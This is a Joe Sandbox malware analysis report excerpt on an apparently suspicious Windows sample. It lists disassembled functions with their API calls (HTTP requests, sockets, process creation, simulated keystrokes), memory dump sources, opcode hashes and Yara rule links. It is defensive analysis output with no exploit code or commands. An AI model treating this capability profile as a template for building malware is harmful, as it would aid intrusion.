                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                            • String ID:
                            • API String ID: 272304278-0
                            • Opcode ID: 6df29fd87b1210b46c21980e9a82bb90a87e7c4054c558e56cd6119cbb0c4123
                            • Instruction ID: 340a0385f239deb048db8eb75f13d4dad24c2620260a80d7de27c1abfb2a5b5d
                            • Opcode Fuzzy Hash: 6df29fd87b1210b46c21980e9a82bb90a87e7c4054c558e56cd6119cbb0c4123
                            • Instruction Fuzzy Hash: FB215C31500244AFDB61ABB4FD49BA97BB1EB44321F104220FA66A54F1CB710991EF11
                            Function 000BD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                            Download Yara Rule
                            APIs
                            • EnumChildWindows.USER32(?,000BDD46), ref: 000BDC86
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: 39e920db440218e66b1c074e8426ccbbe17120afce9ac60cf751c243737c776f
                            • Instruction ID: 5b9f11e2623c6259ef245d82cd9a759cd1cf680370b2c72d8fda3ede43fee401
                            • Opcode Fuzzy Hash: 39e920db440218e66b1c074e8426ccbbe17120afce9ac60cf751c243737c776f
                            • Instruction Fuzzy Hash: ED91B630A00507EBCF48EF64C881BEEFBB5BF15350F54812AD85AA7152EF706959DBA0
                            Function 000845A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000845F0
                            • CoUninitialize.OLE32(?,00000000), ref: 00084695
                            • UnregisterHotKey.USER32(?), ref: 000847BD
                            • DestroyWindow.USER32(?), ref: 000F5936
                            • FreeLibrary.KERNEL32(?), ref: 000F599D
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F59CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: 59eaac61dcb682e44aaae3e55d4ff59da63c9241e5f7a15b864d8a05b804ef4d
                            • Instruction ID: ee44bc805709a922d7148b026997b2b5de9041c1383e6089c7157d77cda23279
                            • Opcode Fuzzy Hash: 59eaac61dcb682e44aaae3e55d4ff59da63c9241e5f7a15b864d8a05b804ef4d
                            • Instruction Fuzzy Hash: FC915734604602CFC719FF24D895AA8F3F4FF15705F5142A9E58AA7662DB30AE6ACF00
                            Function 0009C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowLongW.USER32(?,000000EB), ref: 0009C2D2
                              • Part of subcall function 0009C697: GetClientRect.USER32(?,?), ref: 0009C6C0
                              • Part of subcall function 0009C697: GetWindowRect.USER32(?,?), ref: 0009C701
                              • Part of subcall function 0009C697: ScreenToClient.USER32(?,?), ref: 0009C729
                            • GetDC.USER32 ref: 000FE006
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FE019
                            • SelectObject.GDI32(00000000,00000000), ref: 000FE027
                            • SelectObject.GDI32(00000000,00000000), ref: 000FE03C
                            • ReleaseDC.USER32(?,00000000), ref: 000FE044
                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FE0CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: c87c4c5aadc0e7ea414418af2e1c76b48938e8a6d87505d7a254f713d4fe5c2c
                            • Instruction ID: b61bce8668b85024c19ebb6f3b4cba5c1ee81e89c184cb7acbb77a8c8cf29f57
                            • Opcode Fuzzy Hash: c87c4c5aadc0e7ea414418af2e1c76b48938e8a6d87505d7a254f713d4fe5c2c
                            • Instruction Fuzzy Hash: 7C71D131900249EFDF218FA4CC80EFA7BB5FF49350F14426AFE565A5A6CB718881EB51
                            Function 000EEAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                              • Part of subcall function 0009B736: GetCursorPos.USER32(000000FF), ref: 0009B749
                              • Part of subcall function 0009B736: ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 000EEB0E
                            • ImageList_EndDrag.COMCTL32 ref: 000EEB14
                            • ReleaseCapture.USER32 ref: 000EEB1A
                            • SetWindowTextW.USER32(?,00000000), ref: 000EEBC2
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000EEBD5
                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 000EECAE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            • API String ID: 1924731296-2107944366
                            • Opcode ID: c68643cc276f089d4299ce810c2c4b86a67869bb18c0b80c4fa76eef1198e56f
                            • Instruction ID: aef6a89f2e8945f88652a62e54b46e486e97d5412508396c64a02b45db7e5206
                            • Opcode Fuzzy Hash: c68643cc276f089d4299ce810c2c4b86a67869bb18c0b80c4fa76eef1198e56f
                            • Instruction Fuzzy Hash: C551CD30204344AFD704EF64DC56FAA7BE5FB88704F104A2DF995972E2DB709984CB62
                            Function 000D4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4C5E
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D4C8A
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D4CCC
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4CE1
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4CEE
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000D4D1E
                            • InternetCloseHandle.WININET(00000000), ref: 000D4D65
                              • Part of subcall function 000D56A9: GetLastError.KERNEL32(?,?,000D4A2B,00000000,00000000,00000001), ref: 000D56BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 1241431887-3916222277
                            • Opcode ID: 8a664fe139f746d7545fe3a9b760700bb4976d33aec5a5d1e5e326864aebdae6
                            • Instruction ID: b0bec7126a334947c602f8975fd106476d57238b5ede5bbd032ce729be1ba3ce
                            • Opcode Fuzzy Hash: 8a664fe139f746d7545fe3a9b760700bb4976d33aec5a5d1e5e326864aebdae6
                            • Instruction Fuzzy Hash: 51413AB1501618BFEB129FA4DC89FFA77ADEB08354F14411BFA05AA291D7B099448BB0
                            Function 000DBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0011DBF0), ref: 000DBBA1
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0011DBF0), ref: 000DBBD5
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000DBD33
                            • SysFreeString.OLEAUT32(?), ref: 000DBD5D
                            • StringFromGUID2.OLE32(?,?,00000028,?,0011DBF0), ref: 000DBEAD
                            • ProgIDFromCLSID.OLE32(?,?,?,0011DBF0), ref: 000DBEF7
                            • CoTaskMemFree.OLE32(?,?,?,0011DBF0), ref: 000DBF14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                            • String ID:
                            • API String ID: 793797124-0
                            • Opcode ID: 7fef7db9435110116529ba95ed772d10ae996076cb66a15342a853ba57843efd
                            • Instruction ID: 0cd46027384bc1539370b6ad60ba6262545c8fc5296604e2f72ca7ae593a700f
                            • Opcode Fuzzy Hash: 7fef7db9435110116529ba95ed772d10ae996076cb66a15342a853ba57843efd
                            • Instruction Fuzzy Hash: 02F10C75900209EFCF14DFA4C884EAEB7BAFF89714F11849AF905AB251DB71AD41CB60
                            Function 000E23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000E23E6
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E2579
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E259D
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E25DD
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E25FF
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000E2760
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 000E2792
                            • CloseHandle.KERNEL32(?), ref: 000E27C1
                            • CloseHandle.KERNEL32(?), ref: 000E2838
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 75017aba47cbd7e045c68d2e7afe94d512a2c54a8835954e8cc13ba3839933b4
                            • Instruction ID: 3a5c98268b7ec223c27aed1d514285403bdfb617aa6b4231022e0f38fcadfcf8
                            • Opcode Fuzzy Hash: 75017aba47cbd7e045c68d2e7afe94d512a2c54a8835954e8cc13ba3839933b4
                            • Instruction Fuzzy Hash: 7FD1AF716043419FCB14EF25C991BAABBE5BF85314F14855DF889AB2A2DB30EC41CB52
                            Function 000D9A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                            Download Yara Rule
                            APIs
                            • select.WSOCK32 ref: 000D9B38
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9B45
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 000D9B6F
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000D9B90
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9B9F
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 000D9C51
                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0011DBF0), ref: 000D9C0C
                              • Part of subcall function 000BE0F5: _strlen.LIBCMT ref: 000BE0FF
                              • Part of subcall function 000BE0F5: _memmove.LIBCMT ref: 000BE121
                            • _strlen.LIBCMT ref: 000D9CA7
                            • _memmove.LIBCMT ref: 000D9D10
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                            • String ID:
                            • API String ID: 3637404534-0
                            • Opcode ID: f60d7faa90d2b5db2e04116f1a49e411ca7b0b75b5e6f78f799a715fe45eb02f
                            • Instruction ID: ac0f5439f56db0289b052d804ec1394c9e472c525e7e1cc6fcc776f021c02bd5
                            • Opcode Fuzzy Hash: f60d7faa90d2b5db2e04116f1a49e411ca7b0b75b5e6f78f799a715fe45eb02f
                            • Instruction Fuzzy Hash: D6818B72504300ABD710EF64DC45EABB7E9EB88724F10462EF5959B292DB70DD04CBA2
                            Function 000EB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB204
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: 87123df4ec86cbeb96a8512756807412f5e090098ce37a75f259343c7f314da8
                            • Instruction ID: b713a75ace4de1d90acf3e62a02a9e4f72ffc80583173f79e3c3111796528f4c
                            • Opcode Fuzzy Hash: 87123df4ec86cbeb96a8512756807412f5e090098ce37a75f259343c7f314da8
                            • Instruction Fuzzy Hash: 31519330500294BFEF309F6ADC96B9F3BA5AF06320F604156FA55F61A2C771E990DB50
                            Function 0009A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FE9EA
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FEA0B
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FEA20
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FEA3D
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FEA64
                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FEA6F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FEA8C
                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FEA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                            • String ID:
                            • API String ID: 1268354404-0
                            • Opcode ID: 074c9a781c0557f254f1b62dda13aea114e51e20ef996b8b26da6fa45e6233c3
                            • Instruction ID: e592fcf23edc5c0254196fc7875b966c681ce3b63c9ce544443d21ab65780c38
                            • Opcode Fuzzy Hash: 074c9a781c0557f254f1b62dda13aea114e51e20ef996b8b26da6fa45e6233c3
                            • Instruction Fuzzy Hash: 10516670600209AFDF20CF68CC81FAA77F4BB09754F104628FA56976A0D7B0ED90AB91
                            Function 0009F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 0009F737
                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 0009F77E
                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 000FEB55
                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 000FEBC1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: 56c8a4e04992b14e4bde72a3ae150180cec0ba2b8456bfd72e9bdecce50b29a5
                            • Instruction ID: 6b975240a85250ed106fdc4d75d490ead77db4921b4a55b922ddf3bfcef585e5
                            • Opcode Fuzzy Hash: 56c8a4e04992b14e4bde72a3ae150180cec0ba2b8456bfd72e9bdecce50b29a5
                            • Instruction Fuzzy Hash: 2F41F93020C6C7AADF754BA8DCC8A7AFAD56B45311F68086DF197C2971C771A880F711
                            Function 000BCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BE158
                              • Part of subcall function 000BE138: GetCurrentThreadId.KERNEL32 ref: 000BE15F
                              • Part of subcall function 000BE138: AttachThreadInput.USER32(00000000,?,000BCDFB,?,00000001), ref: 000BE166
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE06
                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000BCE23
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000BCE26
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE2F
                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000BCE4D
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BCE50
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE59
                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000BCE70
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BCE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            • Opcode ID: fa58497beb02f21925a7b8d47c909384775b388bf81146f2b560aae5332d1869
                            • Instruction ID: c95f40b9b6fd6dc88f7ba6adba61acaa8a468f76f238614b00d61f7d2a9b9877
                            • Opcode Fuzzy Hash: fa58497beb02f21925a7b8d47c909384775b388bf81146f2b560aae5332d1869
                            • Instruction Fuzzy Hash: 9A1104B1510618BEF7102FA4DC8EFAA3A2DEB48754F210415F3806B0E0CEF26C809AA4
                            Function 000DC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            • Opcode ID: 8d30e09783a734b3526d396c603831062287b5dd08d5304a40b0b4714b2f7800
                            • Instruction ID: d4a23e5ebbff31e2cea4b3122ad74233d0c7e3848d3b6e629f0b20485e9847a1
                            • Opcode Fuzzy Hash: 8d30e09783a734b3526d396c603831062287b5dd08d5304a40b0b4714b2f7800
                            • Instruction Fuzzy Hash: 54E19171A0031AABEF24DFA8D895EEE77F5AF48314F14802AEA45A7381D7709D41CB61
                            Function 000E9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000E9926
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 000E993A
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000E9954
                            • _wcscat.LIBCMT ref: 000E99AF
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 000E99C6
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000E99F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
